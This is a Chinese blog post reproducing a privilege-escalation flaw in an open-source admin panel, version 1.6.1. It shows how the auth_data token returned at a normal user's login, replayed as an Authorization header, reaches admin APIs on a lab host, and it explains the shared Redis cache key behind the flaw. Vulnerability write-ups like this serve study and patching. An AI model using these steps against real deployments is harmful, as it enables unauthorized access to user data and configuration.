某开源管理平台越权访问漏洞复现

已于 2023-01-01 17:50:22 修改
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 从入门到入狱 文章标签: 安全 web安全 服务器 后端 前端
于 2022-12-28 22:54:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/128475096
版权

越权访问漏洞复现

某开源的管理平台,该漏洞可导致普通用户越权访问调用管理员的API。

影响范围

v1.6.1

漏洞复现

靶机ip:192.168.1.9

登录地址:

http://192.168.1.9:8080/#/login

在这里插入图片描述

先注册个号

用户名:tpaer@hack.com
密码:123qwert

在这里插入图片描述

回到登录页面进行登录并抓包

在这里插入图片描述

放包返回了一段json,json中的auth_data为当前用户的认证信息后面需要用到

在这里插入图片描述

{
    "data": {
        "token": "64aa38aff3c56866eaaa7405c5602920",
        "auth_data": "dHBhZXJAaGFjay5jb206JDJ5JDEwJG5Vc2FQL0pENU1qQXhlZDMxZTlrM3VOeEFHWEQ4Sk1mZnU0amY4WEVjbm5ieGhwRFE5WVBh"
    }
}

登录后会进入到如下界面
在这里插入图片描述

尝试直接访问,访问失败

http://192.168.1.9:8080/api/v1/user/info

在这里插入图片描述

重新抓包添加Authorization请求头,值为auth_data

Authorization:dHBhZXJAaGFjay5jb206JDJ5JDEwJG5Vc2FQL0pENU1qQXhlZDMxZTlrM3VOeEFHWEQ4Sk1mZnU0amY4WEVjbm5ieGhwRFE5WVBh

成功访问

在这里插入图片描述

在请求时携带Authorization请求头,就可以使用管理员的API进行越权访问用户列表、机场配置、订阅信息等内容

漏洞原理

在v1.6.1版本中新加入了缓存机制:用户访问时会将Authorization头存入redis。在下次请求时,如果Authorization在缓存中存在就认为是合法用户。

前后台的API都使用了这个机制,并且这两个缓存的key是相同的,在后台读取到缓存后也并没有确认用户身份。

用户在登录时Authorization头缓存在redis,后台接口携带相同的Authorization进行访问,在redis找到了相同的Authorization会放行,从而绕过后台的鉴权系统。

tpaer
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
E-office OA 平行越权漏洞复现
afei001
01-09 664
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 泛微e-office是泛微公司面向小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。但泛微e-office OA系统存在的漏洞还真不少。这个平行越权漏洞之前早就在乌云上爆出过了。 泛微E-office官网:w...
掌握开源工具:高效进行漏洞复现的实践指南
最新发布
07-05
开源工具因其成本效益和灵活性而成为进行漏洞复现的首选。本文将详细介绍如何使用开源工具进行漏洞复现,包括工具的选择、使用场景和实际应用示例。 使用开源工具进行漏洞复现是一个高效且成本效益高的方法,它可以...
pikachu越权漏洞复现
weixin_48776804的博客
02-16 228
pikachu越权漏洞复现
推荐开源项目:VulntoES - 安全漏洞数据管理利器
gitblog_00053的博客
06-14 339
推荐开源项目:VulntoES - 安全漏洞数据管理利器 项目地址:https://gitcode.com/ChrisRimondi/VulntoES 项目介绍 VulntoES 是一个轻量级的Python脚本,旨在帮助用户管理和存储从多种安全扫描器提取的漏洞信息到Elasticsearch数据库。它支持Nessus, Nikto, Nmap以及OpenVAS等主流扫描工具的数据导入,为安全分...
漏洞复现】水平越权漏洞
只有不断学习才不会被茫茫人海淹没!
04-03 907
墨者学院漏洞复现 链接: https://www.mozhe.cn/. 启动靶场: 登录,同bp抓包: 在这个包看到id: 发送到暴力破解模块遍历一下: 然后来到登录界面,右键图片,检查源代码属性: 从我们暴力破解遍历的结果找到id尾号为16的,就是马春生的个人信息: 链接: https://www.cmd5.com/. 然后登录,成功找到key: ......
越权漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-03 566
越权漏洞 原理:越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。 目前存在着两种越权操作类型:横向越权操作(水平越权)和纵向越权(垂直越权)操作。 越权一般分为水平越权和垂直越权
vulhub漏洞复现-CouchDB(CVE-2017-12635/6)垂直越权漏洞远程代码执行
遇事不决冲冲冲
11-03 3475
CouchDB Apache CouchDB是一个开源的数据库,面向文档的数据库管理系统,专注易用性"完全使用Web"。使用JSON作为存储格式,JavaScript为查询语言,MapReduce和HTTP作为API的NoSQL数据库 CVE-2017-12635垂直越权漏洞 思路 由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。可用于非管理员用户赋予自身管理员身份权限。 在Erlang: > jiffy:decode(“{“a”:”1″, “a”:”2
开源广告管理平台openx 多国语言
06-29
开源广告管理平台开源广告管理平台开源广告管理平台开源广告管理平台
WODECMS开源内容管理系统 v1.0
12-04
WODECMS开源内容管理系统(前身TCCMS)是基于自主研发的一款PHP开发框架开发的内容管理系统。其开发框架设计思路借鉴了java的struts和hibernate...具有高效,安全,简单的特点。 WODECMS开源内容管理系统设计上尽量简单,
TokenCore 开源漏洞奖励计划
01-07
如果你刚刚知道 imToken,提交漏洞报告前请先访问我们的产品帮助心。 漏洞奖励范围 漏洞奖励计划仅限于 TokenCore 开源代码的代码审计,GitHub 仓库: https://github.com/consenlabs/token-
Catfish(鲶鱼)cms-带有越权漏洞的源码(1).zip
12-31
Catfish(鲶鱼)cms-带有越权漏洞的源码,亲测真实有效,可下载使用,如有侵权,请联系CSDN管理员删除
cms漏洞复现-越权漏洞
yummy11111的博客
07-19 730
cms漏洞复现
越权访问漏洞原理以及修复方法
it知识分享 free for nothing..
01-02 2203
越权访问漏洞原理以及修复方法
详解越权漏洞
weixin_43025534的博客
05-22 2395
越权漏洞是指应用程序未对当前用户操作的身份权限进行严格校验,导致用户可以操作超出自己管理权限范围的功能,从而操作一些非该用户可以操作的行为。假设一个在线论坛应用程序,每个用户都有一个唯一的用户ID,并且用户可以通过URL访问他们自己的帖子。如果应用程序没有进行足够的验证和授权检查,就会错误地将Alice的角色更改为管理员,从而使她能够访问和执行与商品管理相关的操作。如果应用程序没有正确实施访问控制机制,没有验证用户的身份和权限,那么Bob将成功地通过URL参数访问到Alice的帖子。
V2board 1.6.1 提权漏洞(web缓存投毒)
m0_63069714的博客
06-01 1218
前端的认证方式后端并没有进行区分,导致前端认证方式和后端认证方式被同一个健全接口所利用,而这个健全接口没有去区分到底是普通用户还是管理员,从而产生了此漏洞。用户自己注册一个账户,通过访问如下这样一个curl来进行获取我们的认证信息(其邮箱和密码是自己注册的邮箱和密码)通过burpsuite进行抓包,修改Request请求的内容。在gethub直接拉去docker镜像。拷贝这个认证信息,并替换到如下数据包
垂直越权漏洞的修复
热门推荐
u011651342的博客
05-23 1万+
前段间我参与的项目被公司的安全部门检测出垂直越权安全漏洞,我组长让我负责修复一下。 首先我查阅了一下什么是越权,以及什么是垂直越权。 (一)越权以及垂直越权 越权访问漏洞指应用在检查授权存在纰漏,使得攻击者在获得低权限用户账户后,可以利用一些方式绕过权限检查,访问或者操作到原本无权访问的高权限功能,在实际的代码审计,这种漏洞往往很难通过工具进行自动化监测,因此在实际应用危害很大。其与未授权访问有一定差别,目前存在着两种越权操作类型,横向越权操作(水平越权)和纵向越权操作(垂直越权) 水平越
复现B-漏洞复现
qq_51926773的博客
11-28 4312
一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 D.
Web攻防作业 | 越权访问漏洞全解析
Ms08067安全实验室
11-24 1612
文章来源 | MS08067Web高级攻防第3期作业本文作者:xiaobai05050505越权访问漏洞一、越权漏洞概述1、概述通常情况下,一个 Web 程序功能流程是登录 - 提交请求 - 验证权限 - 数据库查询 - 返回结果。在验证权限阶段逻辑不够缜密,便会导致越权。(常见的程序都会认为通过登录后即可验证用户的身份,从而不会做下一步验证,最后导致越权。)2、分类①、未授权访问:没有某个功能...
laravel-admin越权访问漏洞改如何修复
05-19
Laravel-Admin 是一个开源的后台管理框架,它基于 Laravel 框架,提供了一套 CRUD 操作的界面。Laravel-Admin 越权漏洞是指攻击者可以通过构造特定的 URL,绕过权限验证,访问未授权的页面或进行未授权的操作。 修复 Laravel-Admin 越权漏洞,可以按照以下步骤进行: 1. 升级 Laravel-Admin 到最新版本。开发组在最新版已经修复了该漏洞。 2. 如果无法升级到最新版本,可以手动修复漏洞。具体步骤如下: - 打开项目的 `app/Admin/routes.php` 文件,找到需要修复的路由。 - 在需要进行权限验证的路由前,加上如下代码: ```php // 需要进行权限验证的路由 $router->resource('users', 'UserController')->middleware('auth.admin'); ``` 上述代码的 `middleware('auth.admin')` 表示该路由需要通过 `auth.admin` 间件进行验证。 - 创建 `app/Http/Middleware/AuthenticateAdmin.php` 间件。 ```php <?php namespace App\Http\Middleware; use Closure; use Illuminate\Support\Facades\Auth; class AuthenticateAdmin { public function handle($request, Closure $next) { if (Auth::guard('admin')->check()) { return $next($request); } return redirect('/admin/auth/login'); } } ``` 上述代码的 `Auth::guard('admin')->check()` 表示使用 `admin` guard 进行验证。 - 在 `app/Http/Kernel.php` 文件注册间件。 ```php protected $routeMiddleware = [ // ... 'auth.admin' => \App\Http\Middleware\AuthenticateAdmin::class, ]; ``` 上述代码的 `auth.admin` 表示间件的名字,`\App\Http\Middleware\AuthenticateAdmin::class` 表示间件的类名。 通过以上步骤,就可以修复 Laravel-Admin 越权漏洞了。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值